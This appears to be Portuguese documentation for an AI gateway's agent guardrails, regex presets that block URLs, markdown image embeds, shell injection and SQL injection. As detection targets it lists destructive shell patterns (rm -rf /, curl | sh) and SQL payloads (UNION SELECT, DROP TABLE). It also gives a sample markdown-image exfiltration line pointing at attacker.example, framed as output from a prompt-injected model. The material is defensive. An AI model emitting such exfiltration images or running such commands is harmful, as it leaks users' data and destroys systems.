Guardrails agênticos

Quando um modelo dirige ferramentas, as strings perigosas se escondem em conteúdo comum: uma URL que o agente está prestes a buscar, uma imagem markdown que o cliente carregará automaticamente, um rm -rf / que o modelo ecoa em uma ferramenta de shell, um UNION SELECT que ele emite para um runner de SQL executar. Uma política de conteúdo que só pensa em PII ou segredos perde os quatro. A categoria de preset Agent existe exatamente para esta forma — regras regex determinísticas que bloqueiam a requisição ou resposta antes que uma ferramenta downstream sequer aja sobre ela. Este é um destino focado no caso de uso agêntico. Para o motor de guardrail completo — cada tipo de regra, campo, estágio e rota — veja a referência de Guardrails.

1. Por que agent guardrails são uma superfície distinta

Um guardrail filtra conteúdo — o texto na requisição e o texto na resposta. Para um agente, esse texto se torna uma ação: a URL é buscada, o markdown é renderizado, a linha de shell é executada, o SQL é executado. Então o mesmo motor block / mask que você usa para PII faz dupla função aqui — ele detém um payload no gateway antes que a camada de ferramentas do agente possa transformá-lo em um efeito colateral. A categoria Agent traz quatro presets, cada um uma regra regex com ação block, distribuídos pelos dois estágios:

URL Filter — input, block

Bloqueia qualquer URL http(s) na requisição. Use-o para fluxos de agente onde URLs outbound devem estar em allowlist em vez de abertas. O padrão semeado corresponde a qualquer URL; edite o regex para permitir domínios específicos.

Markdown Image Block — output, block

Bloqueia embeds de imagem markdown (![alt](url)) na resposta do modelo. Defende contra exfiltração por renderização de imagem em clientes que carregam imagens remotas automaticamente — um canal clássico de vazamento de dados onde uma URL de imagem renderizada contrabandeia dados para fora.

Tool Call Shell Block — input, block

Bloqueia padrões óbvios de shell-injection na requisição (rm -rf /, curl … | sh, wget … | bash, escalação sudo). Use-o para fluxos de agente que podem encaminhar input do usuário para uma ferramenta de shell.

SQL Injection in Output — output, block

Bloqueia respostas do modelo que carregam payloads clássicos de SQL-injection (UNION SELECT, OR 1=1, DROP TABLE, terminadores de comentário). Defesa em profundidade para ferramentas que auto-executam SQL que o modelo produziu.

Dois presets filtram input, dois filtram output. URL Filter e Tool Call Shell Block disparam na requisição — antes de o modelo rodar, antes de qualquer cota ser medida. Markdown Image Block e SQL Injection in Output disparam na resposta — depois que o modelo responde, antes de o conteúdo chegar ao seu cliente ou à sua camada de ferramentas. Saber em qual estágio um risco vive é todo o jogo; veja Estágio de input e Estágio de output.

2. Aplique um agent guardrail no console

Cada passo aqui é uma ação de console no gateway hospedado sob sua própria sessão. Criar e editar guardrails exige Developer+ no workspace. Apenas a chamada final /v1/* usa uma chave de relay sk-orca-... — o guardrail em si é configurado inteiramente no console.

Abra o template

No console, abra Guardrails, clique no split-button New guardrail e escolha um preset na categoria de template Agent — ex.: Markdown Image Block. Ele semeia a única regra de block regex no estágio certo.

Nomeie e salve

Dê a ele um nome (≤ 64 chars), ex.: agent-rails, e salve. Um preset é uma semente, não uma trava — adicione as outras três regras Agent ou edite o regex livremente depois (veja §4).

Teste-o no sandbox

Abra a aba Test dentro do editor, cole uma amostra, escolha o estágio correspondente e rode a política atual localmente — sem chamada upstream, sem cota (veja §3).

Vincule uma chave

Edite uma chave de API e escolha agent-rails no menu Guardrail (define guardrail_id na chave), ou marque-o como padrão do workspace. Veja Vincular a uma chave e Padrão de conta.

3. Prove antes de vincular

Prove que a regra dispara antes que qualquer chave aponte para ela. Abra a aba Test, escolha o estágio output e cole uma resposta que uma página envenenada por atacante poderia ter induzido o modelo a emitir:

Here is the result: ![status](https://attacker.example/track?d=secret)

O sandbox avalia a política atual localmente — nada é enviado upstream, nada é medido — e retorna o veredito de block nomeando a regra que disparou. Para uma grade A/B contra um corpus de amostras adversariais e benignas, o Eval harness fica uma aba ao lado.

4. Componha e ajuste as regras

Os quatro presets são sementes. O movimento comum é combiná-los em um único guardrail agent-rails e apertar cada regex à sua stack:

Allowlist de URLs

Comece a partir do URL Filter, depois edite o regex para que bloqueie cada URL exceto seus domínios sancionados — inverta a correspondência para uma allowlist em vez de um block geral.

Escreva seus próprios detectores

Adicione uma regra regex para qualquer forma de payload com que suas ferramentas se importem — padrões RE2, tempo linear, sem backreferences. Padrões compilam uma vez e são cacheados entre requisições.

Misture regras Agent com o resto do motor em um guardrail. Combine-as com uma regra mask do PII Shield ou um block de input do Secrets Blocker — uma política pode carregar cada tipo de regra e o motor as consolida em um único veredito. Veja Ações para block vs. mask vs. flag.

5. Como é um block

Todo preset Agent usa a ação block. Uma requisição bloqueada retorna HTTP 400 com o código de erro guardrail_blocked e uma mensagem nomeando o guardrail e a regra que disparou:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

Uma requisição bloqueada não custa cota — um block no estágio de input (URL Filter, Tool Call Shell Block) dispara antes da medição; um block no estágio de output (Markdown Image Block, SQL Injection in Output) reembolsa a cota pré-consumida depois que a resposta é rejeitada — e é marcada como skip-retry, já que reexecutar o mesmo prompt apenas bloquearia de novo. Veja o erro guardrail_blocked.

O block de output é aplicado em streaming também. Para os dois presets Agent de estágio de output, block vale nos dois casos: em uma resposta não-streaming a resposta é filtrada antes de retornar, e em uma resposta streaming um scanner corta o stream em pleno voo antes que qualquer conteúdo bloqueado chegue ao cliente. Veja Cobertura de streaming.

6. Guardrails são conteúdo; o firewall são chamadas de ferramenta

Agent guardrails são uma primeira camada forte, mas raciocinam sobre strings, não semântica de ferramenta. Eles bloqueiam uma linha de shell no conteúdo — não entendem que o modelo emitiu um tool_call estruturado para uma ferramenta destrutiva, ou que uma requisição outbound está indo para um IP de metadados. Essa camada de chamada de ferramenta é o Firewall: ele avalia os tool_calls emitidos pelo modelo, o tools/call de MCP e o egress outbound com vereditos como allow / audit / deny / pending_approval. Os dois se compõem — guardrails filtram o texto, o firewall governa a ação.

Firewall

Governe as chamadas de ferramenta emitidas pelo modelo, chamadas MCP e egress com vereditos allow / audit / deny / approval.

Guardrails vs. Firewall

Quando recorrer a um guardrail de conteúdo vs. um firewall de chamada de ferramenta — e como rodar ambos.

Segurança de agentes de IA

A pilha de controle completa de agente: conteúdo, ferramentas, MCP e egress.

Agência excessiva

A ameaça que estes rails tratam — um agente que faz mais do que deveria.

7. Veja o que disparou

Toda regra que dispara registra um match — tipo de regra, ação, estágio e uma string de detalhe — exibido no feed Matches do workspace. A substring correspondente em si é registrada apenas quando Log raw content está ligado, que está desligado por padrão. Agrupe e filtre o feed por guardrail, tipo de regra e ação para observar a taxa de acerto da sua regra de agente e ajustar falsos positivos. Veja Feed de matches, Logging e privacidade e Ajustar falsos positivos.

8. Para onde ir a seguir

Regras de estágio de output

Como a filtragem de resposta funciona para Markdown Image Block e SQL Injection in Output.

Detectores regex

Escreva seus próprios padrões RE2 para estender as regras Agent.

Exfiltração de dados

O canal de exfil que o Markdown Image Block fecha.

Chamadas de ferramenta perigosas

Por que um rail de conteúdo sozinho não basta — combine-o com o firewall.

Agent guardrails mantêm strings perigosas fora do conteúdo que um agente envia e recebe. Para governar as ações que um agente toma — as próprias chamadas de ferramenta, chamadas MCP e egress — suba para o Firewall e leia a linha de base de segurança de agentes de IA. Para o motor de guardrail completo, veja a referência de Guardrails.

​1. Por que agent guardrails são uma superfície distinta

​2. Aplique um agent guardrail no console

​3. Prove antes de vincular

​4. Componha e ajuste as regras

Allowlist de URLs

Escreva seus próprios detectores

​5. Como é um block

​6. Guardrails são conteúdo; o firewall são chamadas de ferramenta

Firewall

Guardrails vs. Firewall

Segurança de agentes de IA

Agência excessiva

​7. Veja o que disparou

​8. Para onde ir a seguir

Regras de estágio de output

Detectores regex

Exfiltração de dados

Chamadas de ferramenta perigosas

1. Por que agent guardrails são uma superfície distinta

2. Aplique um agent guardrail no console

3. Prove antes de vincular

4. Componha e ajuste as regras

5. Como é um block

6. Guardrails são conteúdo; o firewall são chamadas de ferramenta

7. Veja o que disparou

8. Para onde ir a seguir